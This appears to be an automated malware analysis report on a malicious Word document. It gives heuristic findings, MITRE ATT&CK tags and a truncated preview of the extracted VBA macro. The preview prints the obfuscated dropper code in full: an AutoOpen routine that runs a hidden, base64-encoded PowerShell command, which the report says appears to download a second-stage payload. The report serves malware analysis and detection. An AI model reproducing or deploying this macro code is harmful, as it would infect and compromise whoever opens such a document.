MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro with an Autoopen function that calls a Shell() function. This function is used to execute a PowerShell command, which is obfuscated but appears to be designed to download and execute a second-stage payload. The presence of the Autoopen macro and the Shell() call strongly indicate malicious intent.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15765 bytes |
SHA-256: 5c554edb395bb0d18093e4f1d18f250f0c3f3c1b680b12d11ec04912eebea496 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wvjUjsVjRBrV" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function jwYUlUitb() On Error Resume Next jcmsY = XkTIEv - Cos(JjKCSM) * 1 - Chr(46272) / 791 - ChrB(XXtizw) ILfkQ = 29731 AAoik = TCpLf - Cos(jSmIu) * 1 - Chr(56226) / 7718 - ChrB(EOwqi) kKzYKN = 87619 jwYUlUitb = OZBGiUw + UEWdJEAOsON + NujwnRHpS + MGlChHC + fcNMwK + DcVRRKB + GBFrAMFOT + mNAujY + anVmvLWiMQk JCiin = PUihCm - Cos(hVClH) * 1 - Chr(24438) / 28010 - ChrB(mCwzI) IFQAS = 37564 End Function Sub Autoopen() On Error Resume Next JkiMp = ljfQn - Cos(NDovnD) * 1 - Chr(828) / 59615 - ChrB(XzjjfW) PSjkS = 84634 IliiOwThNXo (jwYUlUitb) lXYSB = jGlKGu - Cos(TKdzR) * 1 - Chr(77948) / 47133 - ChrB(kwdKoi) NjCaV = 58885 End Sub Function IliiOwThNXo(wuUwBwzUY) On Error Resume Next XOlwB = RNVck - Cos(nFpjS) * 1 - Chr(57658) / 37508 - ChrB(AYvHNz) sCHjZ = 78939 mOMTm = UWdAa - Cos(qPYzkw) * 1 - Chr(4659) / 83791 - ChrB(wTdkC) YLOwL = 26544 lpqioDlwUHX = Shell(iTufUbVfRZ + Chr(vbKeyP) + UpMwoZj + wuUwBwzUY, vbHide) SaXzr = Sivuh - Cos(IzUCXj) * 1 - Chr(43431) / 95148 - ChrB(ouiik) vLOEP = 45426 End Function Attribute VB_Name = "zzckFrYYC" Function OZBGiUw() On Error Resume Next rjKdt = wTJdAo - Cos(EjjIa) * 1 - Chr(2091) / 21700 - ChrB(zOwJH) dTszz = 87180 ocPCSzVXI = "owersH" + "eLL -WinDow" + "sTyle " + "hidden -e I" + "AAuACgAKABnAG" + "UAVAAtA" + "HYAYQBy" + "AEkAQQBCAGw" + "AZQAgACc" + "AKgBtAEQAcgAqAC" QHmLMs = zGduTc - Cos(oIVkSK) * 1 - Chr(98123) / 84957 - ChrB(LUmXS) QiAvb = 77451 XziUj = "cAKQAuAG4AYQ" + "BNAEUA" + "WwAzACwAMQ" + "AxACwA" + "MgBdAC0AagBvA" + "EkAbgAnACcAKQAo" + "ACAAKA" + "AoACIAewAxADcA" + "fQB7ADEAMAB9AHs" + "ANAA3AH0A" zwOIR = skEqi - Cos(oKXOjj) * 1 - Chr(84930) / 46250 - ChrB(arZVaz) wtXBAP = 22323 jZpqOsawF = "ewAxADIANgB9AH" + "sANwAzAH0Aew" + "AzADEAfQ" + "B7ADkANAB" + "9AHsAMQAxAD" WKsoz = HdIviq - Cos(PUMjQk) * 1 - Chr(43807) / 10370 - ChrB(mrLDmL) dbZww = 85519 vGmKjHbzOr = "UAfQB7ADk" + "AOQB9AH" + "sANQA5AH" + "0AewA" + "xADAAMAB9AHs" + "AOQAwAH0Ae" + "wAzADcAf" OZBGiUw = ocPCSzVXI + XziUj + jZpqOsawF + vGmKjHbzOr End Function Function UEWdJEAOsON() On Error Resume Next rDYGT = RawJw - Cos(ZLRkio) * 1 - Chr(37360) / 64912 - ChrB(Acvvv) iTFru = 45208 nZZWSjTS = "QB7ADEAMgA0A" + "H0AewA3ADAAf" + "QB7ADIAMQB9A" + "HsAMAB9" + "AHsAMgA3A" VfriDr = MuCGD - Cos(HLruJf) * 1 - Chr(20614) / 95780 - ChrB(bcLXCm) rRCLb = 81410 TnbmfV = "H0Aew" + "A4ADYAfQB7AD" + "YAMQB9AHsAOQA4A" + "H0AewA" + "1ADUA" sAlbKL = aprKD - Cos(cKhPM) * 1 - Chr(362) / 59404 - ChrB(OSjok) DkEsK = 33068 msPQuEM = "fQB7A" + "DQAMAB9AHsANwB9" + "AHsAMQAwADYAf" + "QB7ADYAN" + "gB9AHs" + "AMwA4AH" + "0AewA1ADYAfQB7" + "ADgAMQB9AH" + "sAMQAxA" wuYDA = jAnTNz - Cos(ijkmw) * 1 - Chr(52339) / 22013 - ChrB(ihFmZF) qkwzm = 89196 IXXHUBarZ = "DQAfQB7ADIAN" + "gB9AHsANQA3A" + "H0AewA3ADQAf" + "QB7ADEAMgAxAH0" + "AewA3ADYAf" + "QB7ADEA" + "MAA3AH0AewA0A" + "DEAfQ" QJLMOu = awSpR - Cos(WASujF) * 1 - Chr(82873) / 39249 - ChrB(TQajj) DUNNY = 823 OMwkNnGjrJ = "B7ADYAMgB" + "9AHsA" + "NAA0AH0AewAxAD" + "EAMgB9AHsA" + "NwA5AH0AewAx" + "ADkAfQB7AD" balMQ = DjmzIi - Cos(qSEQjD) * 1 - Chr(17734) / 8098 - ChrB(vmiOtX) FbsbGY = 83805 uKIcNUipZJ = "YAfQB7AD" + "UAOAB9AHs" + "ANwA1AH0AewAxA" + "DIAMAB9AHs" + "AMQAyAH0Aew" + "A4ADQAfQB7A" + "DEAMQB" + "9AHsAMQ" + "A1AH0AewAxADQAf" WpMQd = SRBATl - Cos(zhVrM) * 1 - Chr(72502) / 59851 - ChrB(iCkjEj) PCaRa = 91740 HlFiOHTzd = "QB7ADEAM" + "QA4AH0AewAxAD" + "IANQB9AHsAO" + "AA4AH0Aew" + "AxADAAMwB9A" + "HsAMQAx" + "ADMAfQB7" + "ADEAMQA5AH0AewA" + "4ADkAfQB7" qqsaIc = jNZmN - Cos(uXkun) * 1 - Chr(23961) / 18591 - ChrB(mckYAw) zaCKU = 6857 rZisqw = "ADcAMQB9AH" + "sANgA5AH0" + "AewA2ADUAfQB7" + "ADQAOAB9AHsA" fwldCi = pKurZc - Cos(SfiOmC) * 1 - Chr(7937) / 26442 - ChrB(CHjRj) XbtEDs = 72163 ZqRPLwT = "OAA1A" + "H0AewA0ADUAfQB" + "7ADQANg" + "B9AHsAO ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.